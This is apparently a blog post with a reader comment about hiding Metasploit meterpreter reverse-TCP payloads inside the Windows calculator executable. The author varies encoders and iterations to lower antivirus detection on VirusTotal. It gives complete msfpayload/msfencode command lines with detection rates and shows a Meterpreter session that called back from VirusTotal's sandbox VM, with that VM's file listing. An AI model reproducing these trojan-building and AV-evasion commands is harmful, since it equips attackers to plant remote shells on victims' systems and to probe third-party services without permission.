I really wanted to see what was inside the analysis folder and have some better statistic results from the antivirus. At that time, Metasploit integrated a patch from ( http://www.metasploit.com/redmine/issues/1244 ), so I gave it a try also.
Detection rates and examples follow below; all result rates are from VirusTotal:
( calc.exe is the calculator from Windows XP and -k is the new msfencode option that binds two files together and executes both of them in a separate thread )
./msfpayload windows/meterpreter/reverse_tcp LHOST=hostA raw | ./msfencode -b '' -c 5 -e x86/call4_dword_xor -x calc.exe -k -t exe -o testcalc-new1.exe
Result: 14/42 (33.34%)
Immediately when I uploaded the file I got a connection on my multi/handler,
[*] Meterpreter session 2 opened (hostA:4444 -> xx.xx.xx.131:49874)
Listing: C:\
============
Mode Size Type Last modified Name
---- ---- ---- ------------- ----
100777/rwxrwxrwx 118784 fil Wed Mar 24 11:52:27 +0200 2010 58568023.exe
100777/rwxrwxrwx 0 fil Wed Jan 14 05:59:52 +0200 2009 AUTOEXEC.BAT
100666/rw-rw-rw- 0 fil Wed Jan 14 05:59:52 +0200 2009 CONFIG.SYS
40777/rwxrwxrwx 0 dir Thu Jan 15 08:30:08 +0200 2009 Documents and Settings
100444/r--r--r-- 0 fil Wed Jan 14 05:59:52 +0200 2009 IO.SYS
100444/r--r--r-- 0 fil Wed Jan 14 05:59:52 +0200 2009 MSDOS.SYS
100555/r-xr-xr-x 47564 fil Tue Feb 28 15:00:00 +0200 2006 NTDETECT.COM
40555/r-xr-xr-x 0 dir Thu Jan 15 09:00:53 +0200 2009 Program Files
40777/rwxrwxrwx 0 dir Wed Jan 14 06:26:09 +0200 2009 System Volume Information
40777/rwxrwxrwx 0 dir Thu Jan 15 10:29:19 +0200 2009 WINDOWS
100666/rw-rw-rw- 211 fil Wed Jan 14 05:40:14 +0200 2009 boot.ini
100666/rw-rw-rw- 267964416 fil Wed Mar 24 12:50:57 +0200 2010 hiberfil.sys
100444/r--r--r-- 250048 fil Wed Jan 14 16:59:55 +0200 2009 ntldr
100666/rw-rw-rw- 402653184 fil Wed Mar 24 12:50:57 +0200 2010 pagefile.sys
100777/rwxrwxrwx 469 fil Wed Mar 24 11:52:19 +0200 2010 start.bat
100777/rwxrwxrwx 332800 fil Wed Jun 11 08:09:08 +0300 2008 wget.exe
Too bad I didn't see the analysis folder that I was looking for. The connection was dropped 2-3 seconds later; I assume the whole connection lasts 10 seconds and the VM, from what it appears, is rebooted or disconnected.
Trying again,
./msfpayload windows/meterpreter/reverse_tcp LHOST=hostA raw | ./msfencode -b '' -c 5 -e x86/call4_dword_xor -x calc.exe -t exe -o testcalc-new.exe
Result: 8/42 (19.05%)
Same template, but without binding the exe files; it was not bad actually.
With a different encoder,
./msfpayload windows/meterpreter/reverse_tcp LHOST=hostA raw | ./msfencode -b '' -c 5 -x calc.exe -t exe -o testcalc-newnaiNObind5.exe
Result: 6/42 (14.29%)
Adding binding,
./msfpayload windows/meterpreter/reverse_tcp LHOST=hostA raw | ./msfencode -b '' -c 5 -x calc.exe -k -t exe -o testcalc-newnai.exe
Shikata ga nai, the default encoder, gave a result of 12/42 (28.58%).
I got almost the same results increasing the encoding iterations to 15
./msfpayload windows/meterpreter/reverse_tcp LHOST=hostA raw | ./msfencode -b '' -c 15 -x calc.exe -k -t exe -o testcalc-newnai15.exe
Result: 13/42 (30.96%)
And the last one, using the XOR encoder
./msfpayload windows/meterpreter/reverse_tcp LHOST=hostA raw |./msfencode -c 20 -e x86/call4_dword_xor -x calc.exe -t exe -o testcalc-xor20.exe
Result: 8/42 (19.05%)
Plain encoding of the payload (Shikata ga nai) gives a detection rate of 20/42 (47.62%).
From what I noticed, binding the exe file raises the chances of detection. Most of the time the antivirus engines that detect the executables are the same: Microsoft, NOD32, Symantec, Sophos and something called McAfee-GW-Edition that detects anything as a virus, even plain text and incomplete code.
I really didn't want to put Metasploit code into VirusTotal, but I haven't seen any actual tests and results anywhere. I did some tests on NoVirusThanks ( http://scanner.novirusthanks.org/ ) but the scanner is slow, the results are poor and there are only half as many antivirus engines, 20, on the scanner.
That's all for now. I didn't manage to get the files that I wanted, but I managed to get some results on detection and some information from the VMs that were connecting back every time I uploaded a file. Files are available on request.
Yeah, from my comment over on my blog, the primary thing being pegged is the default template.exe that's used to host a given payload. A couple of AV providers (Microsoft, primarily) have identified a way to locate any executable with a payload sliced in, but they are still in the minority.